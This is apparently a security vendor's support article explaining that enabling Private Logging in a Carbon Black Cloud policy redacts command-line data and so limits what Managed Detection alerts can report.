Just Published! Threat Report: Exposing Malware in Linux-Based Multi-Cloud Environments | Download Now

Managed Detection: Does Enabling Private Logging Cause the Sent Alerts to Contain Less Information?

Managed Detection: Does Enabling Private Logging Cause the Sent Alerts to Contain Less Information?

Environment

  • CBC Web Console: All Versions
  • Managed Detection

Question

Does enabling Private Logging in a CBC policy cause the alerts sent from the Managed Detection team to contain less information?

Answer

Enabling Private Logging within a policy can prevent the Managed Detection team from sending much of the useful information obtained from an alert - thereby limiting the scope of the Manage Detection alerts.

Additional Notes

  • The most important IOC being considered by the Managed Detection team is typically the command line argument, which is redacted if Private Logging is enabled.
  • Enabling Private Logging can prevent the Managed Detection team from identifying "living off the land" attacks.

Related Content


Was this article helpful? Yes No
100% helpful (1/1)
Article Information
Author:
Creation Date:
‎09-09-2020
Views:
435
Contributors